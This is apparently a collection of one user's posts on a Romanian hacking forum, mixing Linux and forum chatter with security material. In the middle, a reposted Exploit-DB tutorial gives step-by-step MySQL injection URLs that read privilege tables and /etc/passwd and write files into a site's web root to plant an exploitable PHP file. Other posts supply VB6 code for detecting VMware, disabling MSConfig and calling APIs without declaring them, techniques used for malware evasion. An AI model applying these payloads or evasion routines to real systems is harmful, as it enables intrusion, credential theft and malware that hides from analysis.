Nytro

Nu aia inseamna sa dai drepturi de autor. Asadar, nu e nevoie sa se specifice pagina de unde au fost luate informatiile, doar daca e vorba de un articol care nu are specificat autorul, sau alte astfel de cazuri.

Nu prea am inteles ce vrei sa zici. Pui ce nume de tabel, ce coloana sau ce fisier vrei tu. Numai sa exista pe server.

Nu o sa contina nici un mecanism de localizare prin GPS. E acelasi lucru ca si cu buletinu: o poza cu tine si alte prostii. Dar e mai "cool", mai "trendy". Nu prea ii inteleg pe analfabetii aia de credinciosi care: "Cipu contine pe Satana!!". Care e legatura intre cipurile astea si Satana?

Baza de date "mysql" impreuna cu tabelele sale exista deja. Apartin serverului MySQL.

Cred ca e vorba de [..] adica [ .. ] si cred ca merge

Programare http://www.codexpert.ro/

Am reparat si "meniul" de emoticoane. Acum nu se mai repeta (primele care apar acolo): Astept aici probleme legate de emoticoane. Nu vreau sa vad alte prostii sau teste aici.

Am votat Mandriva pentru ca asta e distributia pe care o folosesc si care cred ca mi-a placut cel mai mult. Avantaje: KDE (poti alege Gnome la instalare, eu nu suport Gnome), Package Manager care nu iti creaza atatea probleme ca Synaptic (bine, am vrut sa dezinstalez Avahi si imi scotea si Eclipse si multe alte lucruri utile cu care habar nu am ce legatura are), ai acele optiuni ale sale (Configure your computer) de unde poti face multe modificari utile, vine cu o larga gama de pachete, se updateaza singur automat (eu am si upgradat la Spring) si multe altele. Si mi-a mai placut Slackware, care este mai putin user-friendly dar de la care am invatat multe. Imi placea ca steteam logat pe root si faceam ce ma taia capul, mi-am editat toate fisierele de "start-up", faceam ce ma ducea capul, si il facusem sa booteze foarte repede (scosesem sa seteze hardware clock, hostname si multe altele).

MySQL Injection - Simple Load File and Into OutFile | MySQL Injection - Simple Load File and Into OutFile (tutorial) | | Author: MikiSoft ---------------------------------------------------------------- === [ Part 1 - Introduction ] If you know (basic) MySQL Injection, you can read this tutorial... Ok, let's see now what are Load File and Into OutFile. -- What are Load File and Into OutFile? That are syntaxes (used in MySQL Injections). Load File: Reads the file and returns the file contents as a string. Into OutFile: Writes the selected rows to a file. The file is created on the server host, so you must have the file privilege to use this syntax. File to be written cannot be an existing file, which among other things prevents files (such as "/etc/passwd") and database tables from being destroyed. (... from: MySQL.com) Ok, let's begin now! - [ Part 2 - Access to "mysql.user" table and file privileges ] If you are using MySQL Injection method (to hack sites), and before you find target table (and columns), check, if you have access to "mysql.user" table. And you must replace in URL one visible column (i.e. number, that is shown, on page), with (string) "user", to see user name. Let's see our example: http://vulnsite.com/index.php?id=-1+union+all+select+1,user,3,4+from+mysql.user-- In our example, column (number) 2 can be seen on our vulnerable page. If page returns user name, in place where is that visible column (shown) on site, that's good - you have access (to "mysql.user" table), and you can continue to read this tutorial. Don't forget to remember user name that you have seen! In our example that happens (we have access to "mysql.user" table), and we can continue to check now if we have file privileges. You must now replace in URL: "user", with (string) "group_concat(user,0x3a,file_priv)", to check, if you have file privileges on (your) vulnerable site. Here is our example: http://vulnsite.com/index.php?id=-1+union+all+select+1,group_concat(user,0x3a,file_priv),3,4+from+mysql.user-- Now on place, where is that (visible) column shown (i.e. replaced), it lists users and file privileges (in format: User name:File privileges, ...), and you must find user name that you have seen before, and when you find that user name, look on right side (near that user name), and if it writes "Y" (that means Yes), you have file privileges (and you can continue to read this tutorial), otherwise, if it writes "N" (that means No), you haven't file privileges. In our example we have file privileges (of course) - "... ,ouruser:Y, ...". Let's go now to the next part. - [ Part 3 - Using Load File syntax ] Load File is useful when you want to read some (configuration) files (it's like LFI - Local File Inclusion), ex. "/etc/passwd", "/etc/shadow", etc. Syntax is: load_file('FILE') Here is our example - if we want to read "/etc/passwd" file: http://vulnsite.com/index.php?id=-1+union+all+select+1,load_file('/etc/passwd'),3,4+from+mysql.user-- In place where is column (number) 2, it will show (source of) "/etc/passwd" file (on page). Note 1: "../" - means move to directory back. Note 2: If it shows error (when you try to read some file) - it has magic quotes enabled (it add slashes before and after "'" symbols), and you have to (avoid that and) convert file name (i.e. text/string), to Hex or Char (and then remove "'" symbols): For Hex - Always put "0x" (text) before hex string (without any spaces), and that (final) string must not contain (any) spaces(!) ; ex. (Load File - "/etc/passwd":) load_file(0x2f6574632f706173737764) For Char - Usage: char(NUMBERS,NUMBERS,NUMBERS...) ; If you convert string (i.e. text) to Char, and if converted text (to Char) contain spaces (between numbers), you must replace all that spaces with commas(!) ; ex. (Load File - "/etc/passwd":) load_file(char(47,101,116,99,47,112,97,115,115,119,100)) BTW. Here is one translator, i.e. text to Hex and (text to) Char converter: http://home2.paulschou.net/tools/xlate/ That's all for Load File syntax. - [ Part 4 - Using Into OutFile syntax ] Into OutFile is useful when you want to write/make some file (on your vulnerable site/server), ex. make (simple PHP) file, that is vulnerable on RFI (Remote File Inclusion), and then exploit that hole... Syntax is: INTO OUTFILE 'FILE' Note 1: That syntax must be always on end (it's like table)! Ex. ...+INTO+OUTFILE+'/FILE'-- To write (your) text in (your) file (on vulnerable site/server), replace in URL one visible column (i.e. number, that is shown, on page), with (your) text (to be written, in your file), in quotes... Let's see our example - we want to write text "testing" in file "test.txt" (on our vulnerable site/server), in site directory: http://vulnsite.com/index.php?id=-1+union+all+select+1,"testing",3,4+INTO+OUTFILE+'/home/vulnsite/www/test.txt'-- Note 2: If you have two or more visible columns (i.e. numbers, that are shown, on your vulnerable page), you have to replace that columns (i.e. numbers, in URL), with word "null"(!) (If you don't replace, that numbers will be written together with your text in your file, on vulnerable site/server.) In our example, visible columns are - 2 and 3 (and we must do replacing): http://vulnsite.com/index.php?id=-1+union+all+select+1,"testing",null,4+INTO+OUTFILE+'/home/vulnsite/www/test.txt'-- And then, if page loads normally (without any errors), we have successfully made our file (on our vulnerable site/server), and location of our file (on our vulnerable site/server), will be: http://vulnsite.com/test.txt Note 3: If you want to use in (your) text (to be written, in your file) Return/Enter button, just (type your text somewhere - in converter/translator, and) convert it to Hex or Char... Note 4: You must write (i.e. make all your files) into site path, otherwise, Into OutFile syntax won't work. Note 5: If it shows blank (i.e. error, on page), where should be located (your) text (to be written, in your file) - it has magic quotes enabled (it add slashes before and after "'" symbols), and you have to (avoid that and) convert text (i.e. string), to Hex or Char (and then remove "'" symbols) - see above explanation (and link to converter), in (end of) part 3... Warning: Don't convert (your) file name into Hex or Char, otherwise, it won't work (that's only for Into OutFile syntax)! And, if (your) vulnerable site have magic quotes (feature) enabled, Into OutFile syntax will not work. That's all for Into OutFile syntax. - [ Part 5 - End ] That's all about that syntaxes, used in MySQL Injections (with access to "mysql.user" table, of course)... I don't know what else to say, just - GL & HF!!! -- Greetz to (communities): Ljuska.org, MadSpot.org That's all folks! Bye. === @ Exploit-DB

By Victor A. Milokum, Apriorit Inc | 17 Mar 2010 Articolul: http://www.codeproject.com/KB/system/sst-unhook.aspx

Pun link, e aranjat si se vede mult mai bine. By SergeyPopenko, Apriorit Inc, Ivan Romanenko | 17 Aug 2009 Articolul aici: http://www.codeproject.com/KB/system/hide-driver.aspx

'----------------------------------------- 'Detect VMWare 'Tested : VNWare 6.0 -> 7.0 'Coder : DungCoi (VirusVN.com) 'Email : dungcoivb@gmail.com '----------------------------------------- Private Type DISPLAY_DEVICE cb As Long DeviceName As String * 32 DeviceString As String * 128 StateFlags As Long DeviceID As String * 128 DeviceKey As String * 128 End Type Private Declare Sub GetSystemInfo Lib "kernel32" (lpSystemInfo As SYSTEM_INFO) Private Type SYSTEM_INFO dwOemID As Long dwPageSize As Long lpMinimumApplicationAddress As Long lpMaximumApplicationAddress As Long dwActiveProcessorMask As Long dwNumberOrfProcessors As Long dwProcessorType As Long dwAllocationGranularity As Long dwReserved As Long End Type Private Declare Function EnumDisplayDevices Lib "user32" Alias "EnumDisplayDevicesA" (Unused As Any, ByVal iDevNum As Long, lpDisplayDevice As DISPLAY_DEVICE, ByVal dwFlags As Long) As Boolean Sub Main() Dim strVGA As String strVGA = getVGACard If InStr(1, LCase(strVGA), "vmware") > 0 Then MsgBox "Dze dze. VMWare", , "VirusVN.com" Else MsgBox "I'm not running on VMWare :P", , "VirusVN.com" End If End End Sub Public Function getVGACard() As String Dim DD As DISPLAY_DEVICE DD.cb = Len(DD) If EnumDisplayDevices(ByVal 0&, 0, DD, ByVal 0&) Then getVGACard = Left$(DD.DeviceString, InStr(1, DD.DeviceString, Chr$(0)) - 1) Else getVGACard = "" End If End Function

'KERNEL32 Private Declare Function CreateSemaphoreW Lib "KERNEL32" (ByVal lpSemaphoreAttributes As Long, ByVal lInitialCount As Long, ByVal lMaximumCount As Long, ByVal lpName As Long) As Long '--------------------------------------------------------------------------------------- ' Procedure : DisableMsConfig ' Author : Karcrack ' Date : 12/08/2010 '--------------------------------------------------------------------------------------- ' Public Function DisableMsConfig() As Boolean Call CreateSemaphoreW(0, 0, 1, StrPtr("MSConfigRunning")) DisableMsConfig = (Err.LastDllError = 0) End Function

Author: Karcrack Source: http://www.advancevb.com.ar/?p=567 '--------------------------------------------------------------------------------------- ' Module : mZombieInvoke ' Author : Karcrack ' Now : 09/08/2010 13:37 ' Purpose : Calling API without declaring ' Only uses VB6 functions ' History : 20100908 First cut ....................................................... '--------------------------------------------------------------------------------------- Option Explicit Private Type Zombie_STRUCT1 cNull As Currency 'Must be 0 ppS2 As Long 'Pointer to pointer to Zombie_STRUCT2 End Type Private Type Zombie_STRUCT2 lNull As Long 'Must be 0 lAddr As Long 'The Addr End Type Private Type tAPICall ptsLIB As Long ' Pointer to ANSI String that contains Library (NULL TERMINATED!) ptsProc As Long ' Pointer to ANSI String that contains Procedure(NULL TERMINATED!) lReserved As Long ' Just reserved... lPointer As Long ' Pointer to the buffer that will contain temp variables from DllFunctionCall lpBuffer(3) As Long ' Buffer that will contain temp variables End Type Private Type DUMB_LONG lLNG As Long End Type Private Type BYTES_LONG b1 As Byte: b2 As Byte b3 As Byte: b4 As Byte End Type 'MSVBVM60 Private Declare Function DllFunctionCall Lib "MSVBVM60" (ByRef typeAPI As tAPICall) As Long Private Declare Function Zombie_AddRef Lib "MSVBVM60" (ByRef tStructure As Zombie_STRUCT1) As Long Private bvASM(&HFF) As Byte Public Function Invoke(ByVal sLibName As String, ByVal sProcName As String, ParamArray vParams() As Variant) As Long Dim hMod As Long Dim S1 As Zombie_STRUCT1 Dim S2 As Zombie_STRUCT2 Dim i As Long Dim iCount As Long hMod = GetPointer(sLibName, sProcName) '//POP EAX '//POP EBX '//PUSH EAX Call AddByte(&H58, iCount): Call AddByte(&H5B, iCount): Call AddByte(&H50, iCount) For i = UBound(vParams) To LBound(vParams) Step -1 '//PUSH CLng(vParams(i)) Call AddPush(CLng(vParams(i)), iCount) Next i '//CALL hMod '//RET Call AddCall(hMod, iCount): Call AddByte(&HC3, iCount) S2.lAddr = VarPtr(bvASM(0)) S1.ppS2 = VarPtr(VarPtr(S2)) Invoke = Zombie_AddRef(S1) End Function Private Function GetPointer(ByVal sLib As String, ByVal sProc As String) As Long Dim tAPI As tAPICall Dim bvLib() As Byte Dim bvMod() As Byte bvLib = StrConv(sLib + vbNullChar, vbFromUnicode): bvMod = StrConv(sProc + vbNullChar, vbFromUnicode) With tAPI .ptsLIB = VarPtr(bvLib(0)): .ptsProc = VarPtr(bvMod(0)) .lReserved = &H40000: .lPointer = VarPtr(.lpBuffer(0)) End With GetPointer = DllFunctionCall(tAPI) End Function Private Sub AddCall(ByVal lpPtrCall As Long, ByRef iCount As Long) Call AddByte(&HB8, iCount) '//MOV EAX, ________ Call AddLong(lpPtrCall, iCount) '//_______, XXXXXXXX Call AddByte(&HFF, iCount) '//CALL EXX Call AddByte(&HD0, iCount) '//____ EAX End Sub Private Sub AddPush(ByVal lLong As Long, ByRef iCount As Long) Call AddByte(&H68, iCount) '//PUSH, ________ Call AddLong(lLong, iCount) '//____, XXXXXXXX End Sub Private Sub AddLong(ByVal lLong As Long, ByRef iCount As Long) 'Swap Endian (Ej: 0xDEADBEEF <-> 0xEFBEADDE) Dim tDL As DUMB_LONG Dim tBL As BYTES_LONG tDL.lLNG = lLong LSet tBL = tDL Call AddByte(tBL.b1, iCount): Call AddByte(tBL.b2, iCount) Call AddByte(tBL.b3, iCount): Call AddByte(tBL.b4, iCount) End Sub Private Sub AddByte(ByVal bByte As Byte, ByRef iCount As Long) bvASM(iCount) = bByte: iCount = iCount + 1 End Sub Sample: Invoke "USER32", "MessageBoxW", 0, StrPtr("Karcrack FTW!!!"), StrPtr("Fuck yeah!"), 0 Vedeti in exemplu ce face. Foloseste numai API-uri din MSVB60.DLL.

1) Ideea de IP Stealing e penibila. Daca ruleaza programul tau, poti face orice pe acel PC, dar tu ii iei IP-ul? Apoi ce? 2) Metoda este extrem de stupida. Am vazut ca exista System.Net.Dns.GetHostByName si System.Net.Dns.GetHostName, dar ar fi de preferat API-urile (gethostbyname si gethostname). Sa descarci o pagina in care apare IP-ul si sa il citesti de acolo... Oricum, felicitari, majoritatea "dorm", e bine ca mai sunt si oameni interesati de anumite lucruri.

Decat sa va plateasca pe voi mai bine ii da ei 20-30-50 de RON si ii da ea parola.

sosetutza: Stiu, le-am pus pentru fiecare combinatie, adica sa mearga si ": D" si ": d" si altele. pax: http://i38.tinypic.com/15pgw1i.png

Cauta pe aici: Simple IM programming sau cam asa ceva. Sunt prezentate ideile de baza, restul depinde de tine.

E multe de stiut pentru asa ceva. In primul rand trebuie sa ai cunostinte solide de networking. Apoi apare marea problema. Protocolul YMSG (cred ca te referi la bootere pentru Yahoo! Messenger, sa iti poti "da afara" dusmanii de pe mess) nu este public, si trebuie sa faci sniffing sa prinzi unele lucruri. Si daca le prinzi, trebuie sa iti dai si seama care e rostul lor. Oricum, cauta, descarca si uita-te peste libpurple.

Uite o idee mai buna. Faci tu 1000 de conturi si intri pe rand pe ele. Se pastreaza parca cei care au "activat" in ultima jumatate de ora la "online". Daca esti rapid bati singur recordul

Sunt utile astfel de topicuri. Prin acestea ne arata cat ii duce capul si stim la ce sa ne asteptam de la ei.

"deci WMP suport? JavaScript" Imi place, dar vreau sa fac o mica corectare. WMP nu suporta JavaScript, ci foloseste ieframe.dll (sau shadowctl.dll parca) care este un control ActiveX. Cum sa spun... Incorporeaza functionalitatea browser-ului IE. Cred ca intelegi mai bine daca o sa citesti/vizionezi unul dintre multele tutoriale despre "crearea unui browser in VB6".

Gandeste-te la un articol pe care doresti sa il scri si trimite-mi un PM cu cateva detalii despre el, daca esti interesat.

Cred ca primele 2 volume sunt de ajuns. Primul prezinta lucrurile de baza, iar al doilea lucruri putin mai complicate. Nici nu stiam ca exista volumul 4.

Ce zice cel care a descoperit problema (arkon) pe blogul sau: "It’s very hard to exploit it for code execution, on the edge of impossible. That’s why I felt safe about releasing it publicly Still curious, if anybody is able to do it."